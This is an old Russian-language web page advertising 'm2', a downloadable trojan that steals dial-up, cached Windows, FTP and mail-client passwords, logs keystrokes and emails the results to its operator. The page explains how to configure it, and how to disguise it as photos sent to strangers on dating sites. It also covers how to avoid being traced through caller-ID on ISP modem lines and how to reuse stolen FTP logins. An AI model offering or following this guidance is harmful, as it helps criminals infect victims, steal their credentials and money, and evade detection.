m2


Описание

Последняя версия 1.5 30.06.2001

Вот сделал очередное обновление. Решены проблемы с отправкой мыла, теперь мы не используем SMTP, работать должно со всеми мылами.

Комплект: m2_15_setup.exe, m2_15_jpg.exe, m2_15_com.exe (несколько модификаций с разными иконками), и конфигуратор.
Скачать (Замените расширение "zp" на "zip")
Внимание! Программа создана исключительно в образовательных целях. Автор не несёт на себе ответственность за её использование, действуйте на свой страх и риск.



Возможности:

  • Присоединение к любым другим файлам!

  • Тащит диалап пароли из TheBat!'а

  • Добавлен кейлоггер!!

  • ДиалАп пароли с телефонами, логинами, со скриптами, и с dns серверами.

  • Пароли из PWL кеша.

  • Пароли из EDialer'а, теперь они расшифровываются!

  • Пароли от Windows commander'а.

  • Определяет версию ОС.

  • Определяет используемое соединение(если это ДиалАп).

  • Определяет используемое устройство, для выхода в инет.

  • Какнить чего ещо добавлю, пишите ваши пожелания мне на мыло myztic@mail.ru
    При обнаружении коня всякими антивирусами или ещо какими антитроянскими прогами, просьба проинформировать меня об этом, будем принимать меры :)
    Так же большая просьба сообщать мне обо всяких глюках и багах, если таковые обнаружаться

    Навигация по сайту:

  • Принцип действия

  • Что надо делать после конфигурации и как впаривать коня

  • Ваша безопасность

  • Небольшой список телефонов с АОНами

  • Некоторые диапазоны сетей провайдеров

  • Как настроить

  • Обозначения

  • Ссылки



  • Принцип действия:

    Для получения ДиалАп паролей динамически подгружается Rasapi32.dll, и импортируются функции RasGetEntryProperties и RasGetEntryDialParams, которые достают пароли, телефоны и прочие скрипты из маздаевской телефонной книги.

    Для получения паролей из PWL файлов в маздайе предусмотренна специальная функция WNetEnumCachedPasswords, которая импортируется из mpr.dll динамически.

    FTP пароли от WindowsCommander'а берутся из ини файла wcx_ftp.ini, который лежит в маздай папке. Как пользоваться этими паролями?
    Ставите себе WindowsCommander 4.0, делаете ftp соединение с каким нить паролем, лезете в маздай папку и ищите файл wcx_ftp.ini, открываете его и находите то соединение, какое вы только что сделал, ищите там строку с паролем, она должна выглядеть типа :A54F435E3D234A876BA469, и меняете её на ту что пришла вам, естессно ftp сервер должен быть то же что вам пришло.



    Что надо делать после конфигурации и как впаривать коня.

    Если вдруг вам понадобилось сменить иконку, в инете есть рульная прога MicroAngelo. Приведу один пример не плохого способа как впаривать коня всяким ламерам. Идёте на сервер знакомств( www.mheart.ru, www.fortuna.ru, www.kiss.ru, и др.), и пишите всем подряд, типа "меня зовут так-то, я бы хотел с тобой познакомиться, и т.д. и т.п.(конешно про себя писать не надо, нужно чо нить придумать :), и прикладываете к письму свои фотки, ну тоесть коня, лучше присоединить к нему риальную фотку.


    Ваша безопасность

    В последнее время, злые дядьки-админы разных провайдеров стали ставить на свои момедные пулы АОНы. Это очень сильно обламывает, т.к. это реальная опасность быть пойманым, в лучшем случае вам просто позвонит владелец аккаунта, и предложит вернуть не много денег, за его спизженные часы, ну а в худшем вам могут позвонить в дверь дядьки в форме.
    Как всё таки определить наличие АОНа
    Очень просто. Звоните на момедный номер телефоном, и слушаете как там снимают трубку, обычно без АОНа это выглядит как один двойной щелчок, а с АОНом слышно два двойных щелчка, сначала трубу снимает АОН(или модем), происходит один двойной щелчок, а потом сам модем(или АОН), и сразу слышен ещо один двойной щелчок. Для тренировки позвоните на 9955555, и вы сразу поймёте, как звучат АОНы.


    Небольшой список телефонов с АОНами

    9955555, 9955556 - MTU
    9951111 - Cityline
    Конешно на Citylen'е есть ещо другие телефоны, но к сожелению всех их я не проверял, знаю точно что на ситулине есть телефон 9133949 без АОНа (если ещо его туда не поставили :)


    Некоторые диапазоны сетей провайдеров.

    Например вам пришли пароли, и в письме указан ипи, ну например 212.188.***.***, По этому ипи адресу можно определить провайдера.
    Вот некоторые диапазоны сетей которые я помню:

    212.188.***.*** - MTU
    195.146.***.*** - Cityline
    195.239.***.***, 194.67.***.*** - Russia Online
    213.148.***.*** - Comintern
    195.2.***.*** - Mr.Postman
    195.146.***.*** - Relline
    194.186.***.*** - Rline
    195.230.***.*** - Tcnet
    212.44.***.*** - Sovintel
    212.92.***.*** - Cea
    194.58.***.*** - Relcom
    195.14.***.*** - Corbina


    Как настроить

    m2 Configurator

  • To:
  • Сюда вы вписываете свое мыло, на которое будут приходить пароли.
  • To(second): Сюда можно вписать второе мыло, на которое будут приходить пароли, введено на всякий случай, если не удается отправить по первому мылу. Желательно что б это мыло было в другом домэне чем первое.
  • Description:
  • Просто название, или уникальное имя, или ид, вашего коня
  • Урл для апдейта:
  • Функция пока временно не работает.
  • Через сколько дней повторять посылку:
  • Через сколько дней слать пароли, например есть это 5-ть, то пароли будут приходить каждые 5-ть дней, рекомендуемое значение 4-6. Диапазон допустимых вводимых значений 1-7
    Нажимаете кнопку Browz, выбираете коня, и жмёте кнопку Create. Всё! сконфигуренный конь лежит в папке InfeCteD и готов к использованию.
  • Attach:
  • Присоединяемый файл. Для лучшего эффекта рекомендуется что бы иконки у трояна и у присоединяемого файла были ОДИНАКОВЫЕ!


    Обозначения:

    :os: - Операционная система
    :cp: - Имя комьютера
    :usr: - Имя юзера
    :ip: - Ипи Адрес, например: lamer@dialup184.mtu-net.ru[218.188.45.0]
    :uc: - Название соединения(если ДиалАп)
    :dv: - Девайс для выхода в инет и название девайса
    > Название соединения: # код страны (код города) телефон L: логин P: пароль
    :dn: - Домен для этого соединения(если есть)
    :dns: - Днс1 и Днс2 для этого соединения(если есть)
    :sc: - Скрипт к этому соединению(если есть)
    :ed pass: - Пароль из EDialer'а для этого соединения (если он установлен и если пароль сохранён)
    :thebat!: - Диалап пароли из TheBat!'а
    :rna: - Пароли из PLW кэша
    :wcp: - Пароли из WindowsCommaner'а(ини файл)
    :kl: - Лог кейлоггера


    Ссылки:

    Если вы хотите обменяться ссылками или банерами, мыльте мне или договаримся по ICQ